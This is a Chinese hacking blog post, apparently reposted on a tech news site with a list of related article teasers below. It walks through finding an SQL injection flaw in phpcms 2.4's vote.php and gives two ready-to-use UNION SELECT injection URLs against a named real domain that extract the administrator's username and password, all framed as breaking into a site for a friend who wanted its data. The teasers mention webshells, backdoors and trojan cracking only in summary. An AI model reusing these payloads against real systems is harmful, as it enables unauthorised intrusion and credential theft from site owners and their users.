phpcms2.4漏洞挖掘 phpcms2.4的注入漏洞
今天,朋友丢来一个站,说想拿点资料,但搞了很久老搞不下,叫我帮忙看看
打开一看发现是phpcms2.4,很旧的版本了~~
搞了一下发现存在“上传漏洞”和“远程文件包含漏洞”的页面都被删了,晕,自己挖个把,反正版本旧
挖了1个多小时,发现vote.php中有这样一段代码:
...省略....
case 'result':
if(!intval($voteid)){
message('参数错误!',$PHP_REFERER);
}
$query = $db->query("SELECT * FROM $table_vote_subject where voteid='$voteid' and passed=1");
$vote=$db->fetch_array($query);
$subject=$vote[subject];
$totalnumber=$vote[totalnumber];
$fromdate=date("Y-m-d",$vote[fromtime]);
$todate=$vote[totime] ? date("Y-m-d",$vote[totime]) : "";
$query = $db->query("SELECT * FROM $table_vote_option where voteid='$voteid'");
while($op=$db->fetch_array($query)){
$op[percent1]=$totalnumber ? round(100*$op[number]/$vote[totalnumber],2)."%" : "0%";
$op[percent2]=$totalnumber ? (100-round(100*$op[number]/$vote[totalnumber],0))."%" : "100%";
$ops[]=$op;
}
include template('vote_result');
break;
}
....省略....
代码没问题把?真的吗?再仔细看看!!
“if(!intval($voteid))” 这句代码的意思是啥?
如果提交过来的数据是整型并且不存在于数据库中的话,就返回“参数错误”。
那如果我们提交的数据不是整型呢?如果我们提交的数据不是整型,那么不管提交的数据是否存在于数据库中都不会返回“参数错误”的提示了,这样,注入漏洞就产生了~~哈哈
分别提交
“http://www.cndrt.cn/vote.php?action=result&;voteid=8 and 1=2 union select 1,username,3,4,5,6,7,8,9,10,11,12,13 from phpcms_member where userid=1/*””
“http://www.cndrt.cn/vote.php?action=result&;voteid=8 and 1=2 union select 1,password,3,4,5,6,7,8,9,10,11,12,13 from phpcms_member where userid=1/*””
就能查出管理员了
当然你也可以用concat()把账号密码同时抓出来~
拿到win2003 server的webshell却登不上终端怎么办?
事情是这样的:遭遇一台湾的dns服务器,win2003 server扫描器报告的开放端口:21,53,80ok,弄到一个sa权限的注射点,很爽得拿到一个webshell,透过sqlrootkit,俺就是system权限了 本以为对方菜到家了 谁知故事才刚刚开
详情2018-03-03 11:00:53责编:llp 来源:驱动管家telnet登录命令怎么捕获?怎么修正trigger?
转载:ken如下: telnet登录时口令部分不回显,只能抓取从client到server的报文才能获取明文口令。 所以一般那些监视还原软件无法直接看到口令,看到的多半就是星号(*)。缺省情况 下telnet登录时进入字符输入
详情2018-01-20 16:12:52责编:llp 来源:驱动管家excms oday是留下的后门?利用excms后门可拿shell
以下版本没测试 测试的是最新版本在公布前几小时没有通知官方 ^_^ 哈哈为什么说过程精彩呢? 看完就明白!因为这个漏洞原因非一般! 同时映射出中国软件行业的悲哀!!!经典对白 看代码后台登录文件adminModules
详情2018-03-08 14:58:13责编:llp 来源:驱动管家公共wifi网络的风险问题 黑客的三大阴招
大家都知道现在的大部分的公共场合也安装WiFi,那么公共WiFi网络的风险问题再次成为用户关注的焦点,一起来探讨探讨吧。公共WiFi网络的风险问题再次成为用户关注的焦点。黑客可以通过构造假的WiFi网络盗取公共场
详情2018-02-15 11:38:49责编:llp 来源:驱动管家网络攻击有哪些行为?针对这些行为的解决方案是什么?
近几年,互联网的应用呈现出一种爆发增长的态势,网速越来越快,能够遍寻的软件越来越多,初级黑客凭借一些入门的教程和软件就能发起简单的攻击;另一方面,电脑的价格持续下降,企业内部的终端数量也在逐步增加
详情2018-01-22 09:02:17责编:llp 来源:驱动管家木马制作的故事 木马病毒产业链的诞生
在希腊神话里,特洛伊木马背后是一个凄美的故事。可在如今的互联网世界里,木马背后隐藏着的是一条罪恶的产业链。如果不是因为上周,徐州市鼓楼区人民法院对“温柔木马”等11名犯罪嫌疑人的公开审理,这个王国里
详情2018-01-10 19:22:38责编:llp 来源:驱动管家怎么利用写php文件代码容易被忽略的漏洞?
作者:phpeval前段时间一个程序出的问题。就和这差不多。对于上面的代码。如果在URL提交http: www phpeval cn test php?c=phpinfo(); 就可以发现phpinfo()被执行了。而相应的提交c=echo 11111; 发现1111也被
详情2018-02-28 19:41:48责编:llp 来源:驱动管家u盘写保护怎么设置?通过注册表设置u盘写保护
有时候处于保护电脑文件安全的需要,我们需要设置U盘写保护,只让通过U盘复制文件到电脑,而禁止复制电脑文件到U盘,这种情况下通过U盘写保护就是一项比较简单的方法。如何设置U盘写保护、开启U盘写保护呢?通过
详情2018-01-29 11:00:37责编:llp 来源:驱动管家autorun.inf病毒有什么现象?删除autorun.inf如何做?
病毒现象1) 安全模式无法进入。2) 注册表HKEY_LOCAL_MACHINE SOFTWARE Microsoft Windows NT CurrentVersion Image File Execution Options下多出了许多劫持项,导致一些安全类软件和工具无法打开。图1:
详情2018-01-28 09:33:56责编:llp 来源:驱动管家灰鸽子使用教程 破解灰鸽子成为注册会员
一、给灰鸽子脱壳要想得到灰鸽子的全部功能并挖出他的漏洞,就要给他脱壳。用ASPackdie给他脱壳(因为它是用ASPack加的壳),这个软件很好找,一些黑客网站上都有。先运行ASPackdie找到灰鸽子的主文件H_Client exe,
详情2018-01-17 10:25:13责编:llp 来源:驱动管家
- PunBB的口令重置功能有哪些作用?
- win7删除文件时提示回收站已损坏是否清空该驱动器上的回收站的原因及解决方法
- 在电脑上能使用安卓系统吗?在电脑上使用安卓系统的方法
- 怎么用极品五笔输入法打出特殊符号?这两个方法可以帮到你
- 音质和音效之间有哪些联系和区别?音质和音效的介绍
- 什么是机械键盘 机械键盘入门购买攻略
- 蔚来汽车有望在今年赴美上市
- 华为将在3月27日发布P20旗舰手机家族
- 微软公司宣布将允许政府客户运行微软云服务Azure 增加吸引力
- 电脑设置了开机密码怎么取消?取消开机密码的方法
- Solaris系统安装后Xmanager无法连接怎么办?Xmanager无法登陆的解决方法
- 青橙手机voga v1好用吗?青橙voga v1评测
- 蓝魔r9配置参数介绍 蓝魔r9预约价是多少?
- NVIDIA新显卡gt710性能怎么样 gt710性能评测
- 子网掩码是什么 子网掩码的作用及子网划分方法
- Webshell查杀工具的原理 Webshell查杀工具怎么查杀?
- 如何得到mall信箱密码?linux 8.0主机系统入侵测试
- 如何解决Win10系统安装完显卡驱动后蓝屏的问题
- autohotkey是什么?怎么使用autohotkey来提升操作效率
- 网上报名系统不支持ie11怎么解决?使用兼容性视图可以帮你解决问题